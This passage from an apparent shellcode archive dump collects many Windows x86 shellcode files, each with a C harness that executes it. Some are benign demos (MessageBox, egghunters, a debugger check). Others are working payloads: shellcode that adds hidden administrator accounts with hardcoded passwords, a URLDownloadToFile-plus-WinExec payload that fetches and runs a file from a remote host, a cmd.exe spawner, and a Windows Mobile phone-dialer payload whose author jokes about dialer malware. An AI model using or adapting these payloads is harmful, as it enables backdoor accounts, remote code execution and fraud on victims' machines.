live exploit, so do 20 | let me know if you have a chance to use it. 21 | 22 | Cheers, 23 | SkyLined 24 | 25 | # milw0rm.com [2009-03-16] -------------------------------------------------------------------------------- /Win_x86/Windows_x86_-_Egghunter_Checksum_Routine_Shellcode__18_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ;Exploit Title: Shellcode Checksum Routine 2 | ;Date: Sept 1 2010 3 | ;Author: dijital1 4 | ;Software Link: http://www.ciphermonk.net/code/exploits/shellcode-checksum.asm 5 | ;Tested on: Omelet Hunter Shellcode in MSF 6 | ;"|------------------------------------------------------------------|" 7 | ;"| __ __ |" 8 | ;"| _________ ________ / /___ _____ / /____ ____ _____ ___ |" 9 | ;"| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |" 10 | ;"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" 11 | ;"| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" 12 | ;"| |" 13 | ;"| http://www.corelan.be:8800 |" 14 | ;"| security@corelan.be |" 15 | ;"| |" 16 | ;"|-------------------------------------------------[ EIP Hunters ]--|" 17 | ;" -= Egg Hunter Checksum Routine - dijital1 =- " 18 | 19 | [BITS 32] 20 | 21 | ;Author: Ron Henry - dijital1 22 | ;Email: rlh@ciphermonk.net 23 | ;Site: http://www.ciphermonk.net 24 | ;Greetz to Exploit-db and Team Corelan 25 | 26 | ;Ok... couple of assumptions with this code. First, we're using a single 27 | ;byte as the checksum which gives us a 1 in 255 or ~0.39% chance of a 28 | ;collision. 29 | ;We consider this a worthwhile risk given the overall size of the code; 18 bytes. 30 | 31 | ;There are a couple ways to implement this, but a good example is how it 32 | ;was used in Peter Van Eeckhoutte's omelet egghunter mixin that was recently 33 | ;added to the Metasploit Framework. 34 | 35 | ;We're using a 1 byte footer at the end of the shellcode that contains the 36 | ;checksum generated at shellcode creation. 37 | 38 | ; Variables eax: accumulator 39 | ; edx: points to current byte in shellcode 40 | ; ecx: counter 41 | 42 | egg_size equ 0x7a ;we're testing 122 bytes in this instance 43 | 44 | find_egg: 45 | 46 | xor ecx, ecx ;zero the counter 47 | xor eax, eax ;zero the accumlator 48 | 49 | calc_chksum_loop: 50 | add al, byte [edx+ecx] ;add the byte to running total 51 | inc ecx ;increment the counter 52 | cmp cl, egg_size ;cmp counter to egg_size 53 | jnz calc_chksum_loop ;if it's not equal repeat 54 | 55 | test_ckksum: 56 | cmp al, byte [edx+ecx] ;cmp eax with 1 byte checksum 57 | jnz find_egg ;search for another egg if checksum is bogus -------------------------------------------------------------------------------- /Win_x86/Windows_x86_-_Eggsearch_Shellcode__33_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ; win32 eggsearch shellcode, 33 bytes 2 | ; tested on windows xp sp2, should work on all service packs on win2k, win xp, win2k3 3 | ; (c) 2009 by Georg 'oxff' Wicherski 4 | 5 | [bits 32] 6 | 7 | marker equ 0x1f217767 ; 'gw!\x1f' 8 | 9 | start: 10 | xor edx, edx ; edx = 0, pointer to examined address 11 | 12 | address_loop: 13 | inc edx ; edx++, try next address 14 | 15 | pagestart_check: 16 | test dx, 0x0ffc ; are we within the first 4 bytes of a page? 17 | jz address_loop ; if so, try next address as previous page might be unreadable 18 | ; and the cmp [edx-4], marker might result in a segmentation fault 19 | 20 | access_check: 21 | push edx ; save across syscall 22 | push byte 8 ; eax = 8, syscall nr of AddAtomA 23 | pop eax ; ^ 24 | int 0x2e ; fire syscall (eax = 8, edx = ptr) 25 | cmp al, 0x05 ; is result 0xc0000005? (a bit sloppy) 26 | pop edx ; 27 | 28 | je address_loop ; jmp if result was 0xc0000005 29 | 30 | egg_check: 31 | cmp dword [edx-4], marker ; is our egg right before examined address? 32 | jne address_loop ; if not, try next address 33 | 34 | egg_execute: 35 | inc ebx ; make sure, zf is not set 36 | jmp edx ; we found our egg at [edx-4], so we can jmp to edx -------------------------------------------------------------------------------- /Win_x86/Windows_x86_-_PEB!NtGlobalFlags_Shellcode__14_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | PEB!NtGlobalFlags ( 14 BYTES ) 4 | Author: Koshi 5 | Description: Uses PEB method to determine whether a debugger is 6 | attached to the running proccess or not. No 9x. :( 7 | Length: 14 Bytes 8 | Registers Used: EAX,ESI,ESP 9 | Compiled: jpXV34dd3v09Fh 10 | 11 | */ 12 | 13 | /* 14 | 15 | 00401000 > 6A 70 PUSH 70 16 | 00401002 58 POP EAX 17 | 00401003 56 PUSH ESI 18 | 00401004 333464 XOR ESI,DWORD PTR SS:[ESP] 19 | 00401007 64:3376 30 XOR ESI,DWORD PTR FS:[ESI+30] 20 | 0040100B 3946 68 CMP DWORD PTR DS:[ESI+68],EAX 21 | JE DebuggerPresent ( If equal debugger attached ) 22 | */ 23 | 24 | unsigned char Shellcode[] = 25 | {"\x6A\x70\x58\x56\x33\x34\x64" 26 | "\x64\x33\x76\x30\x39\x46\x68"}; 27 | 28 | 29 | 30 | int main( int argc, char *argv[] ) 31 | { 32 | printf( "Shellcode is %u bytes.\n", sizeof(Shellcode)-1 ); 33 | printf( Shellcode, sizeof(Shellcode) ); 34 | return 0; 35 | } 36 | 37 | // milw0rm.com [2009-02-24] -------------------------------------------------------------------------------- /Win_x86/Windows_x86_-_PEB__Kernel32_dll__ImageBase_Finder__ASCII_Printable__Shellcode__49_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | PEB Kernel32.dll ImageBase Finder ( Ascii Printable ) 4 | 5 | Author: Koshi 6 | 7 | Description: Uses PEB method to locate the ImageBase of Kernel32.dll 8 | ONLY supports NT/2K/XP.. sorry no 9X. ImageBase will be 9 | returned in EAX. No null bytes, obviously, so no need to 10 | encode really. 11 | 12 | Length: 49 Bytes 13 | Registers Used: eax,esi 14 | Compiled: j0X40PPPd3@0^V4L4@^V30VX^4P4L30XPVX^30VX^4X4P30VX 15 | 16 | */ 17 | 18 | /* 19 | 20 | 00401000 > $ 6A 30 PUSH 30 21 | 00401002 . 58 POP EAX 22 | 00401003 . 34 30 XOR AL,30 23 | 00401005 . 50 PUSH EAX 24 | 00401006 . 50 PUSH EAX 25 | 00401007 . 50 PUSH EAX 26 | 00401008 . 64:3340 30 XOR EAX,DWORD PTR FS:[EAX+30] 27 | 0040100C . 5E POP ESI 28 | 0040100D . 56 PUSH ESI 29 | 0040100E . 34 4C XOR AL,4C 30 | 00401010 . 34 40 XOR AL,40 31 | 00401012 . 5E POP ESI 32 | 00401013 . 56 PUSH ESI 33 | 00401014 . 3330 XOR ESI,DWORD PTR DS:[EAX] 34 | 00401016 . 56 PUSH ESI 35 | 00401017 . 58 POP EAX 36 | 00401018 . 5E POP ESI 37 | 00401019 . 34 50 XOR AL,50 38 | 0040101B . 34 4C XOR AL,4C 39 | 0040101D . 3330 XOR ESI,DWORD PTR DS:[EAX] 40 | 0040101F . 58 POP EAX 41 | 00401020 . 50 PUSH EAX 42 | 00401021 . 56 PUSH ESI 43 | 00401022 . 58 POP EAX 44 | 00401023 . 5E POP ESI 45 | 00401024 . 3330 XOR ESI,DWORD PTR DS:[EAX] 46 | 00401026 . 56 PUSH ESI 47 | 00401027 . 58 POP EAX 48 | 00401028 . 5E POP ESI 49 | 00401029 . 34 58 XOR AL,58 50 | 0040102B . 34 50 XOR AL,50 51 | 0040102D . 3330 XOR ESI,DWORD PTR DS:[EAX] 52 | 0040102F . 56 PUSH ESI 53 | 00401030 . 58 POP EAX 54 | 55 | */ 56 | 57 | unsigned char Shellcode[] = 58 | {"\x6A\x30\x58\x34\x30\x50\x50\x50" 59 | "\x64\x33\x40\x30\x5E\x56\x34\x4C" 60 | "\x34\x40\x5E\x56\x33\x30\x56\x58" 61 | "\x5E\x34\x50\x34\x4C\x33\x30\x58" 62 | "\x50\x56\x58\x5E\x33\x30\x56\x58" 63 | "\x5E\x34\x58\x34\x50\x33\x30\x56" 64 | "\x58"}; 65 | 66 | int main( int argc, char *argv[] ) 67 | { 68 | printf( "Shellcode is %u bytes.\n", sizeof(Shellcode)-1 ); 69 | printf( Shellcode, sizeof(Shellcode) ); 70 | return 0; 71 | } 72 | 73 | // milw0rm.com [2008-09-03] -------------------------------------------------------------------------------- /Win_x86/Windows_x86_-_user32!MessageBox__Hello_World!__Null-Free_Shellcode__199_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * This file was automatically generated by mkhex.sh, 3 | * which, together with the complete 4 | * and heavily commented assembly source code 5 | * for this shellcode, is available at 6 | * https://github.com/NoviceLive/shellcoding. 7 | * 8 | * For those curious heads 9 | * striving to figure out what's under the hood. 10 | * 11 | */ 12 | 13 | 14 | # include 15 | # include 16 | # include 17 | 18 | # include 19 | 20 | 21 | int 22 | main(void) 23 | { 24 | char *shellcode = "\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b" 25 | "\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09" 26 | "\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d" 27 | "\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03" 28 | "\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81" 29 | "\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04" 30 | "\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03" 31 | "\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3" 32 | "\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68" 33 | "\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68" 34 | "\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9" 35 | "\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65" 36 | "\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01" 37 | "\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68" 38 | "\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68" 39 | "\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68" 40 | "\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57" 41 | "\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c" 42 | "\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78" 43 | "\x69\x74\x54\x53\xff\xd6\x57\xff\xd0"; 44 | 45 | DWORD why_must_this_variable; 46 | BOOL ret = VirtualProtect (shellcode, strlen(shellcode), 47 | PAGE_EXECUTE_READWRITE, &why_must_this_variable); 48 | 49 | if (!ret) { 50 | printf ("VirtualProtect\n"); 51 | return EXIT_FAILURE; 52 | } 53 | 54 | printf("strlen(shellcode)=%d\n", strlen(shellcode)); 55 | 56 | ((void (*)(void))shellcode)(); 57 | 58 | return EXIT_SUCCESS; 59 | } -------------------------------------------------------------------------------- /Windows/Windows_-_Add_Administrator_User__BroK3n_BroK3n__Null-Free_Shellcode__194_bytes___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | Add Admin User Shellcode (194 bytes) - Any Windows Version 2 | ======================================================== 3 | 4 | Title: Add Admin User Shellcode (194 bytes) - Any Windows Version 5 | Release date: 21/06/2014 6 | Author: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b) 7 | Size: 194 byte (NULL free) 8 | Tested on: Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3 9 | Username: BroK3n 10 | Password: BroK3n 11 | 12 | char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" 13 | "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" 14 | "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" 15 | "\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a" 16 | "\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf" 17 | "\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f" 18 | "\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69" 19 | "\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63" 20 | "\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44" 21 | "\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33" 22 | "\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65" 23 | "\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63" 24 | "\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7"; 25 | 26 | 27 | int main(int argc, char **argv){int (*f)();f = (int (*)())shellcode;(int)(*f)();} -------------------------------------------------------------------------------- /Windows/Windows_-_Add_Local_Administrator_User__RubberDuck_mudbath__+_ExitProcess_WinExec_Shellcode__279_bytes___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title: Allwin WinExec add new local administrator + ExitProcess Shellcode - 279 bytes 3 | Date: 2011-05-25 4 | Author: RubberDuck 5 | Web: http://bflow.security-portal.cz 6 | Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32) 7 | -- command: cmd.exe /c net user RubberDuck mudbath /add && net localgroup administrators RubberDuck /add 8 | -- Username: RubberDuck 9 | -- Password: mudbath 10 | */ 11 | 12 | #include 13 | #include 14 | 15 | int main(){ 16 | unsigned char shellcode[]= 17 | "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B" 18 | "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9" 19 | "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C" 20 | "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0" 21 | "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B" 22 | "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72" 23 | "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" 24 | "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47" 25 | "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F" 26 | "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72" 27 | "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66" 28 | "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14" 29 | "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE" 30 | "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53" 31 | "\xFF\xD2\x6A\x05\xEB\x23\xFF\xD0\x68\x65" 32 | "\x73\x73\x01\x8B\xDF\xFE\x4C\x24\x03\x68" 33 | "\x50\x72\x6F\x63\x68\x45\x78\x69\x74\x54" 34 | "\xFF\x74\x24\x1C\xFF\x54\x24\x1C\x57\xFF" 35 | "\xD0\xE8\xD8\xFF\xFF\xFF\x63\x6D\x64\x2E" 36 | "\x65\x78\x65\x20\x2F\x63\x20\x6E\x65\x74" 37 | "\x20\x75\x73\x65\x72\x20\x52\x75\x62\x62" 38 | "\x65\x72\x44\x75\x63\x6B\x20\x6D\x75\x64" 39 | "\x62\x61\x74\x68\x20\x2F\x61\x64\x64\x20" 40 | "\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63" 41 | "\x61\x6C\x67\x72\x6F\x75\x70\x20\x61\x64" 42 | "\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x6F" 43 | "\x72\x73\x20\x52\x75\x62\x62\x65\x72\x44" 44 | "\x75\x63\x6B\x20\x2F\x61\x64\x64\x00"; 45 | LPVOID lpAlloc; 46 | void (*pfunc)(); 47 | 48 | printf("size = %i bytes\n", lstrlen(shellcode) + 1); 49 | printf("-------------------------\nUsername: RubberDuck\nPassword: mudbath\n"); 50 | system("PAUSE"); 51 | 52 | lpAlloc = VirtualAlloc(0, 4096, 53 | MEM_COMMIT, 54 | PAGE_EXECUTE_READWRITE); 55 | 56 | if(lpAlloc == NULL){ 57 | printf("Memory not allocated!\n"); 58 | return 0; 59 | } 60 | 61 | memcpy(lpAlloc, shellcode, lstrlen(shellcode) + 1); 62 | 63 | pfunc = lpAlloc; 64 | 65 | pfunc(); 66 | 67 | return 0; 68 | } -------------------------------------------------------------------------------- /Windows/Windows_-_MessageBoxA_Shellcode__238_bytes___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title: Allwin MessageBoxA Shellcode 3 | Date: 2010-06-11 4 | Author: RubberDuck 5 | Web: http://bflow.security-portal.cz 6 | Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32) 7 | Thanks to: kernelhunter, Lodus, Vrtule, Mato, cm3l1k1, eat, st1gd3r and others 8 | */ 9 | 10 | #include 11 | #include 12 | #include 13 | 14 | int main(){ 15 | unsigned char shellcode[]= 16 | "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B" 17 | "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9" 18 | "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C" 19 | "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0" 20 | "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B" 21 | "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72" 22 | "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" 23 | "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47" 24 | "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F" 25 | "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72" 26 | "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66" 27 | "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14" 28 | "\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72" 29 | "\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F" 30 | "\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01" 31 | "\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65" 32 | "\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B" 33 | "\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42" 34 | "\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24" 35 | "\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57" 36 | "\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01" 37 | "\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F" 38 | "\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24" 39 | "\x40\xFF\x54\x24\x40\x57\xFF\xD0"; 40 | 41 | printf("Size = %d\n", strlen(shellcode)); 42 | 43 | system("PAUSE"); 44 | 45 | ((void (*)())shellcode)(); 46 | 47 | return 0; 48 | } -------------------------------------------------------------------------------- /Windows/Windows_-_MessageBox_Null-Free_Shellcode__113_bytes___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | User32-free Messagebox Shellcode for any Windows version 3 | ======================================================== 4 | 5 | Title: User32-free Messagebox Shellcode for any Windows version 6 | Release date: 16/10/2013 7 | Author: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b) 8 | Size: 113 byte (NULL free) 9 | Tested on: Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3 10 | */ 11 | 12 | 13 | char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" 14 | "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" 15 | "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" 16 | "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" 17 | "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" 18 | "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74" 19 | "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe" 20 | "\x49\x0b\x31\xc0\x51\x50\xff\xd7"; 21 | 22 | 23 | int main(int argc, char **argv){int (*f)();f = (int (*)())shellcode;(int)(*f)();} -------------------------------------------------------------------------------- /Windows/Windows_-_URLDownloadToFile__http:__bflow_security-portal_cz_down_xy_txt__+_WinExec_+_ExitProcess_Shellcode__Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title: Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode 3 | Date: 2013-22-01 4 | Author: RubberDuck 5 | Web: http://bflow.security-portal.cz 6 | http://www.security-portal.cz 7 | Tested on: Win 2k, Win XP Home SP2/SP3 CZ (32), Win 7 (32/64) 8 | -- file is downloaded from URL http://bflow.security-portal.cz/down/xy.txt 9 | -- xy.txt - http://www.virustotal.com/file/7d0d68f8e378d5aa29620c749f797d1d5fa05356fbf6f9ca64ba00f00fe86182/analysis/1358866648/ 10 | -- xy.txt only shows MessageBox with text "Test application for Allwin URLDownloadToFile shellcode" 11 | and title ">> Author: RubberDuck - http://bflow.security-portal.cz <<" 12 | 13 | */ 14 | 15 | #include 16 | #include 17 | 18 | int main(){ 19 | unsigned char shellcode[] = 20 | "\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B" 21 | "\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53" 22 | "\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72" 23 | "\x20\x03\xF3\x33\xC9\x41\xAD\x03\xC3\x81" 24 | "\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04" 25 | "\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64" 26 | "\x64\x72\x65\x75\xE2\x8B\x72\x24\x03\xF3" 27 | "\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3" 28 | "\x8B\x14\x8E\x03\xD3\x33\xC9\x51\x68\x2E" 29 | "\x65\x78\x65\x68\x64\x65\x61\x64\x53\x52" 30 | "\x51\x68\x61\x72\x79\x41\x68\x4C\x69\x62" 31 | "\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2" 32 | "\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C" 33 | "\x51\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C" 34 | "\x6D\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24" 35 | "\x04\x33\xC9\x51\x66\xB9\x65\x41\x51\x33" 36 | "\xC9\x68\x6F\x46\x69\x6C\x68\x6F\x61\x64" 37 | "\x54\x68\x6F\x77\x6E\x6C\x68\x55\x52\x4C" 38 | "\x44\x54\x50\xFF\xD2\x33\xC9\x8D\x54\x24" 39 | "\x24\x51\x51\x52\xEB\x47\x51\xFF\xD0\x83" 40 | "\xC4\x1C\x33\xC9\x5A\x5B\x53\x52\x51\x68" 41 | "\x78\x65\x63\x61\x88\x4C\x24\x03\x68\x57" 42 | "\x69\x6E\x45\x54\x53\xFF\xD2\x6A\x05\x8D" 43 | "\x4C\x24\x18\x51\xFF\xD0\x83\xC4\x0C\x5A" 44 | "\x5B\x68\x65\x73\x73\x61\x83\x6C\x24\x03" 45 | "\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69" 46 | "\x74\x54\x53\xFF\xD2\xFF\xD0\xE8\xB4\xFF" 47 | "\xFF\xFF" 48 | // http://bflow.security-portal.cz/down/xy.txt 49 | "\x68\x74\x74\x70\x3A\x2F\x2F\x62" 50 | "\x66\x6C\x6F\x77\x2E\x73\x65\x63\x75\x72" 51 | "\x69\x74\x79\x2D\x70\x6F\x72\x74\x61\x6C" 52 | "\x2E\x63\x7A\x2F\x64\x6F\x77\x6E\x2F\x78" 53 | "\x79\x2E\x74\x78\x74\x00"; 54 | 55 | LPVOID lpAlloc = NULL; 56 | void (*pfunc)(); 57 | 58 | lpAlloc = VirtualAlloc(0, 4096, 59 | MEM_COMMIT, 60 | PAGE_EXECUTE_READWRITE); 61 | 62 | if(lpAlloc == NULL){ 63 | printf("Memory isn't allocated!\n"); 64 | return 0; 65 | } 66 | 67 | memcpy(lpAlloc, shellcode, lstrlenA((LPCSTR)shellcode) + 1); 68 | 69 | pfunc = (void (*)())lpAlloc; 70 | 71 | pfunc(); 72 | 73 | return 0; 74 | } -------------------------------------------------------------------------------- /Windows/Windows_-_cmd_exe_+_ExitProcess_WinExec_Shellcode__195_bytes___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes 3 | Date: 2010-06-25 4 | Author: RubberDuck 5 | Web: http://bflow.security-portal.cz 6 | Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32) 7 | Thanks to: kernelhunter, Lodus, Vrtule and others 8 | */ 9 | 10 | #include 11 | #include 12 | #include 13 | 14 | int main(){ 15 | unsigned char shellcode[]= 16 | "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B" 17 | "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9" 18 | "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C" 19 | "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0" 20 | "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B" 21 | "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72" 22 | "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" 23 | "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47" 24 | "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F" 25 | "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72" 26 | "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66" 27 | "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14" 28 | "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE" 29 | "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53" 30 | "\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24" 31 | "\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51" 32 | "\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE" 33 | "\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45" 34 | "\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54" 35 | "\x24\x20\x57\xFF\xD0"; 36 | 37 | printf("Size = %d\n", strlen(shellcode)); 38 | 39 | system("PAUSE"); 40 | 41 | ((void (*)())shellcode)(); 42 | 43 | return 0; 44 | } -------------------------------------------------------------------------------- /Windows/Windows_Mobile_6_5_TR_-_Phone_Call_Shellcode__Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | Title: Windows Mobile 6.5 TR Phone Call Shellcode 2 | Author: Celil Ünüver 3 | /* 4 | 5 | Device: HTC Touch2 6 | System: Windows Mobile 6.5 TR (WinCE 5.0.2) 7 | 8 | Coded by Celil ‹n¸ver from SecurityArchitect 9 | 10 | Contact: 11 | celilunuver[n*spam]gmail.com 12 | www.securityarchitect.org 13 | blog.securityarchitect.org 14 | 15 | 16 | Notes: thats a PhoneCall Shellcode! Do you remember the time of dialers? Dial-up Modem times? ;) 17 | 18 | now is it the time of mobile dialers and malwares to make $$ ? :) 19 | 20 | 21 | EXPORT start 22 | AREA .text, CODE 23 | start 24 | ldr R12, =0x3f6272c 25 | adr r0, lib 26 | mov lr, pc 27 | mov pc, r12 28 | ldr r12, =0x2e806dc 29 | adr r0, num 30 | mov r3, #0 31 | mov r2, #0 32 | mov r1, #0 33 | mov lr, pc 34 | mov pc, r12 35 | 36 | lib dcb "c",0,"e",0,"l",0,"l",0,"c",0,"o",0,"r",0,"e",0,0,0,0,0 37 | num dcb "3",0,"1",0,"3",0,"3",0,"7",0,0,0 38 | ALIGN 39 | 40 | END 41 | 42 | dumpbin /disasm: 43 | 44 | 00011000: E59FC044 ldr r12, [pc, #0x44] 45 | 00011004: E28F0020 add r0, pc, #0x20 46 | 00011008: E1A0E00F mov lr, pc 47 | 0001100C: E1A0F00C mov pc, r12 48 | 00011010: E59FC038 ldr r12, [pc, #0x38] 49 | 00011014: E28F0024 add r0, pc, #0x24 50 | 00011018: E3A03000 mov r3, #0 51 | 0001101C: E3A02000 mov r2, #0 52 | 00011020: E3A01000 mov r1, #0 53 | 00011024: E1A0E00F mov lr, pc 54 